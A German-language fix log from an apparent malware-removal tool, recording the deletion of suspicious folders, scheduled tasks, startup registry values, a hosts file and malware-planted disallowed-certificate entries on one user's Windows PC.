C:\ProgramData\{0f4d7d53-512c-0} => erfolgreich verschoben
C:\ProgramData\{00d223fb-612c-1} => erfolgreich verschoben
C:\Windows\SysWOW64\4 => erfolgreich verschoben
C:\Windows\SysWOW64\1111111 => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\SNAREA => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\Everness => erfolgreich verschoben
C:\Windows\SysWOW64\33 => erfolgreich verschoben
C:\Insist => erfolgreich verschoben
C:\Windows\psgo => erfolgreich verschoben
C:\ProgramData\f9d60eee-41d1-1 => erfolgreich verschoben
C:\ProgramData\f9d60eee-04d5-0 => erfolgreich verschoben
C:\ProgramData\f9d60eee-6bc1-0 => erfolgreich verschoben
C:\ProgramData\f9d60eee-4b23-1 => erfolgreich verschoben
C:\ProgramData\f9d60eee-5761-1 => erfolgreich verschoben
C:\ProgramData\f9d60eee-3ce5-0 => erfolgreich verschoben
C:\Windows\SysWOW64\22 => erfolgreich verschoben
C:\Windows\SysWOW64\11 => erfolgreich verschoben
C:\ProgramData\f9d60eee-58d7-1 => erfolgreich verschoben
C:\ProgramData\f9d60eee-0091-0 => erfolgreich verschoben
"C:\Users\Nick Schuster\AppData\Local\3DM" => nicht gefunden.
C:\ProgramData\{79ad3ae3-412c-1} => erfolgreich verschoben
C:\ProgramData\{74b842e5-112c-0} => erfolgreich verschoben
C:\ProgramData\{4bea5929-412c-0} => erfolgreich verschoben
C:\ProgramData\f9d60eee-6097-0 => erfolgreich verschoben
C:\ProgramData\{341DC82C-83B6-7F87-DEF3-C97D7103A5DF} => erfolgreich verschoben
C:\ProgramData\f9d60eee-5791-0 => erfolgreich verschoben
C:\ProgramData\{698332d3-212c-0} => erfolgreich verschoben
C:\ProgramData\{26445420-112c-1} => erfolgreich verschoben
C:\Windows\System32\Tasks\{C8763487-4C07-317B-EF0E-D6F917015462} => erfolgreich verschoben
C:\ProgramData\575f1242 => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\SNARE => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\AMD => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\SNARER => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\clean => erfolgreich verschoben
C:\Windows\System32\Tasks\Update => erfolgreich verschoben
C:\Windows\System32\Tasks\Windows-PG => erfolgreich verschoben
C:\Update => erfolgreich verschoben
C:\Program Files (x86)\temp => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\Firefox => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\Firefox => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\Yeshat => erfolgreich verschoben
C:\Windows\SysWOW64\3 => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\clean => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\BrowserModule => erfolgreich verschoben
C:\ProgramData\5aceedc5-7cf5-1 => erfolgreich verschoben
C:\ProgramData\5aceedc5-3161-0 => erfolgreich verschoben
C:\Windows\System32\Tasks\Milimili => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\Kyubey => erfolgreich verschoben
C:\Program Files (x86)\MIO => erfolgreich verschoben
"C:\Users\Nick Schuster\AppData\Roaming\WinSAPSvc" => nicht gefunden.
C:\Program Files (x86)\BikaQRss => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\Mikghbiritain => erfolgreich verschoben
C:\Windows\System32\Tasks\Qizsywosale Core => erfolgreich verschoben
C:\Windows\System32\Tasks\Perkeentgreserk => erfolgreich verschoben
"C:\Program Files (x86)\Qizsywosale Core" => nicht gefunden.
C:\Windows\455cd42b03953ae3030f3e9254843325.exe => erfolgreich verschoben
C:\Users\Public\Documents\temp.dat => erfolgreich verschoben
C:\spyhunter.fix => erfolgreich verschoben
C:\ProgramData\ntuser.pol => erfolgreich verschoben
C:\Users\Nick Schuster\Desktop\982652986578268672 => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\agent.dat => erfolgreich verschoben
"C:\Users\Nick Schuster\AppData\Roaming\avv.exe" => nicht gefunden.
C:\Users\Nick Schuster\AppData\Roaming\Installer.dat => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\Main.dat => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\ziptool_wc-9015_setup.exe => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\Microsoft\taskhw.exe => erfolgreich verschoben
HKU\S-1-5-21-3847841184-804715454-2304624315-1001_Classes\CLSID\{D3BB05A4-7B0B-D6FE-9C46-02343C11E1C8} => Schl黶sel erfolgreich entfernt
HKU\S-1-5-21-3847841184-804715454-2304624315-1001_Classes\CLSID\{DC9D74AA-7319-69B5-E1DE-59842454B0BE} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{006195E7-5B35-4800-8C6E-E8E48BDE5D59} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{006195E7-5B35-4800-8C6E-E8E48BDE5D59} => Schl黶sel erfolgreich entfernt
C:\Windows\System32\Tasks\KMSAutoNet => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\KMSAutoNet => Schl黶sel erfolgreich entfernt
C:\ProgramData\KMSAutoS => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{12EA2644-53AB-4F3B-8420-DDC68495A6C2} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{12EA2644-53AB-4F3B-8420-DDC68495A6C2} => Schl黶sel erfolgreich entfernt
C:\Windows\System32\Tasks\Windows-PG => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-PG => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1400CED9-EAA0-49F8-A50B-2477914720B4} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1400CED9-EAA0-49F8-A50B-2477914720B4} => Schl黶sel erfolgreich entfernt
C:\Windows\System32\Tasks\Games\UpdateCheck_S-1-5-21-3847841184-804715454-2304624315-1001 => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Games\UpdateCheck_S-1-5-21-3847841184-804715454-2304624315-1001 => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{16129431-3A87-44D6-B1E9-5B37A253A591} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{16129431-3A87-44D6-B1E9-5B37A253A591} => Schl黶sel erfolgreich entfernt
C:\Windows\System32\Tasks\RunAtStartup => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RunAtStartup => Schl黶sel erfolgreich entfernt
"C:\Users\Nick Schuster\AppData\Roaming\Event Monitor" => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{169116B2-0EF1-475C-8491-807AAB8364E3} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{169116B2-0EF1-475C-8491-807AAB8364E3} => Schl黶sel erfolgreich entfernt
C:\Windows\System32\Tasks\Microsoft\Windows\DeviceSettings\Puperpysikuy => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\DeviceSettings\Puperpysikuy => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2A619B04-44F2-4A39-B52E-0AD07E393C91} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2A619B04-44F2-4A39-B52E-0AD07E393C91} => Schl黶sel erfolgreich entfernt
C:\Windows\System32\Tasks\Prervadom Cloud => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Prervadom Cloud => Schl黶sel erfolgreich entfernt
"C:\Program Files (x86)\Mlecultfowudom" => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2E2640BC-9462-4C5F-90BD-892338D59DF4} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2E2640BC-9462-4C5F-90BD-892338D59DF4} => Schl黶sel erfolgreich entfernt
C:\Windows\System32\Tasks\Milimili => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => Schl黶sel erfolgreich entfernt
"C:\Program Files (x86)\MIO" => nicht gefunden.
"C:\Windows\System32\Tasks\Update" => nicht gefunden.

========= type "C:\Windows\System32\Tasks\Update" =========

Das System kann die angegebene Datei nicht finden.

========= Ende von CMD: =========

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6AFC3B2B-BD1E-4624-B0FF-60E210D98357} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6AFC3B2B-BD1E-4624-B0FF-60E210D98357} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\task Update => Schl黶sel nicht gefunden. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{72FEC8A9-7468-4164-9720-A650AB414362} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72FEC8A9-7468-4164-9720-A650AB414362} => Schl黶sel erfolgreich entfernt
C:\Windows\System32\Tasks\ttwifi => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ttwifi => Schl黶sel erfolgreich entfernt
"C:\Program Files (x86)\ttwifi" => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{74DECB46-8172-4D8D-A795-B4201324F918} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{74DECB46-8172-4D8D-A795-B4201324F918} => Schl黶sel erfolgreich entfernt
C:\Windows\System32\Tasks\Qizsywosale Core => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Qizsywosale Core => Schl黶sel erfolgreich entfernt
"C:\Program Files (x86)\Fepuly" => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{7DF225F2-E9BE-467E-BBE5-6136CE240342} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7DF225F2-E9BE-467E-BBE5-6136CE240342} => Schl黶sel erfolgreich entfernt
C:\Windows\System32\Tasks\Quick Tharks Screen Saver => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Quick Tharks Screen Saver => Schl黶sel erfolgreich entfernt
C:\Program Files\Quick Tharks Screen Saver => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9BC09D15-0FE3-42E6-917C-A7AEE41F44B8} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9BC09D15-0FE3-42E6-917C-A7AEE41F44B8} => Schl黶sel erfolgreich entfernt
C:\Windows\System32\Tasks\Samsung Update => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Samsung Update => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{A885A6AF-A8B5-484C-9416-15C01E02D67D} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A885A6AF-A8B5-484C-9416-15C01E02D67D} => Schl黶sel erfolgreich entfernt
C:\Windows\System32\Tasks\fyKiuMkkXh => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\fyKiuMkkXh => Schl黶sel erfolgreich entfernt
"C:\Program Files (x86)\XIOLoa7MyU" => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B109EF88-6721-40A7-B261-9D175E298958} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B109EF88-6721-40A7-B261-9D175E298958} => Schl黶sel erfolgreich entfernt
C:\Windows\System32\Tasks\Coobeck Monitor => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Coobeck Monitor => Schl黶sel erfolgreich entfernt
"C:\Program Files (x86)\Arucerther" => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B76D98BF-21F4-4F78-A43A-95F8B72AD43D} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B76D98BF-21F4-4F78-A43A-95F8B72AD43D} => Schl黶sel erfolgreich entfernt
C:\Windows\System32\Tasks\{0B047F47-0F0A-0408-0B11-087F0C0B110F} => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0B047F47-0F0A-0408-0B11-087F0C0B110F} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D18984F6-6A81-40A8-A7A5-020084C99227} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D18984F6-6A81-40A8-A7A5-020084C99227} => Schl黶sel erfolgreich entfernt
C:\Windows\System32\Tasks\{C8763487-4C07-317B-EF0E-D6F917015462} => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{C8763487-4C07-317B-EF0E-D6F917015462} => Schl黶sel erfolgreich entfernt
"C:\programdata\575f1242" => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{D66B17AC-FEAC-46B3-A7DF-3865C135032C} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D66B17AC-FEAC-46B3-A7DF-3865C135032C} => Schl黶sel erfolgreich entfernt
C:\Windows\System32\Tasks\Microsoft\Windows\MemoryDiagnostic\VideoMemoryDiagnostic => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\MemoryDiagnostic\VideoMemoryDiagnostic => Schl黶sel erfolgreich entfernt
"C:\ProgramData\VideoMemoryDiagnostic" => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D74DB4BE-DE57-43E2-97AF-575D2663AEE8} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D74DB4BE-DE57-43E2-97AF-575D2663AEE8} => Schl黶sel erfolgreich entfernt
C:\Windows\System32\Tasks\Perkeentgreserk => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Perkeentgreserk => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E6C4E4E8-090E-49DF-8E3F-70FC88E8E56F} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E6C4E4E8-090E-49DF-8E3F-70FC88E8E56F} => Schl黶sel erfolgreich entfernt
C:\Windows\System32\Tasks\{25FE2E5B-9255-99F0-1368-8A42E54326C9} => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{25FE2E5B-9255-99F0-1368-8A42E54326C9} => Schl黶sel erfolgreich entfernt
"C:\ProgramData\{279BD4C5-9030-636E-34A5-319E03364EE3}" => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{EC667399-8041-43FD-BACE-C95F53D20EC6} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EC667399-8041-43FD-BACE-C95F53D20EC6} => Schl黶sel erfolgreich entfernt
C:\Windows\System32\Tasks\SoftUpgrade => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SoftUpgrade => Schl黶sel erfolgreich entfernt
"C:\Program Files (x86)\SoftUpgrade" => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F51F669D-34D8-49E3-9371-1DA093A90419} => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F51F669D-34D8-49E3-9371-1DA093A90419} => Schl黶sel erfolgreich entfernt
C:\Windows\System32\Tasks\Gerfety Renew => nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Gerfety Renew => Schl黶sel erfolgreich entfernt
"C:\Program Files (x86)\Prfasaretaly" => nicht gefunden.
WMI_ActiveScriptEventConsumer_ASEC: <===== ACHTUNG => erfolgreich entfernt
C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\Online Help.lnk => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\www.virtualdj.com.lnk => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnеt Ехрlоrеr.lnk => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\d6731079c9ca4513\Google Chrome.lnk => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\9501e18d7c2ab92e\CyberLyric - Chrome.lnk => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\8e5c0db72600a899\Google Chrome.lnk => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\82c1ad0bea96409d\CyberLyric - Chrome.lnk => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\CyberLyric - Chrome.lnk => erfolgreich verschoben
"C:\Program Files (x86)\Applemy" => nicht gefunden.
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Classes\regfile => Schl黶sel erfolgreich entfernt
"C:\Windows\system32\Drivers\etc\hosts" => wurde entsperrt
C:\Windows\system32\Drivers\etc\hosts => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\Services\AppleAppSvc => Schl黶sel erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\AppleAppSvc => Schl黶sel nicht gefunden. 
HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\Services\Kitty => Schl黶sel erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\Kitty => Schl黶sel nicht gefunden. 
HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\Services\pgt_svc => Schl黶sel erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\pgt_svc => Schl黶sel nicht gefunden. 
HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\Services\srcsrv => Schl黶sel erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\srcsrv => Schl黶sel nicht gefunden. 
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\vnlgp => Wert erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\vnlgp => Wert nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\gplyra => Wert erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\gplyra => Wert nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32\\KMS => Wert erfolgreich entfernt
HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\KMS => Wert nicht gefunden.
C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smss.exe => nicht gefunden.
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder\\smss.exe => Wert erfolgreich entfernt
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\HKOEGBGL4X => Wert erfolgreich entfernt
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\HKOEGBGL4X => Wert nicht gefunden.
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\tsiVideo => Wert erfolgreich entfernt
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\tsiVideo => Wert nicht gefunden.
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\6CC2RLD170 => Wert erfolgreich entfernt
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\6CC2RLD170 => Wert nicht gefunden.
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\03D22C9C66915D58C88912B64C1F984B8344EF09 => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\0F684EC1163281085C6AF20528878103ACEFCAAB => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\1667908C9E22EFBD0590E088715CC74BE4C60884 => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\18DEA4EFA93B06AE997D234411F3FD72A677EECE => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\249BDA38A611CD746A132FA2AF995A2D3C941264 => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\31AC96A6C17C425222C46D55C3CCA6BA12E54DAF => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\331E2046A1CCA7BFEF766724394BE6112B4CA3F7 => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3353EA609334A9F23A701B9159E30CB6C22D4C59 => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\373C33726722D3A5D1EDD1F1585D5D25B39BEA1A => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3D496FA682E65FC122351EC29B55AB94F3BB03FC => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4420C99742DF11DD0795BC15B7B0ABF090DC84DF => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5240AB5B05D11B37900AC7712A3C6AE42F377C8C => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5DD3D41810F28B2A13E9A004E6412061E28FA48D => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\7457A3793086DBB58B3858D6476889E3311E550E => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\76A9295EF4343E12DFC5FE05DC57227C1AB00D29 => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\775B373B33B9D15B58BC02B184704332B97C3CAF => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\872CD334B7E7B3C3D1C6114CD6B221026D505EAB => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\88AD5DFE24126872B33175D1778687B642323ACF => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9132E8B079D080E01D52631690BE18EBC2347C1E => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\982D98951CF3C0CA2A02814D474A976CBFF6BDB1 => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9C43F665E690AB4D486D4717B456C5554D4BCEB5 => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A5341949ABE1407DD7BF7DFE75460D9608FBC309 => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A59CC32724DD07A6FC33F7806945481A2D13CA2F => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD4C5429E10F4FF6C01840C20ABA344D7401209F => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD96BB64BA36379D2E354660780C2067B81DA2E0 => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\CDC37C22FE9272D8F2610206AD397A45040326B8 => Schl黶sel erfolgreich entfernt
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 => Schl黶sel erfolgreich entfernt
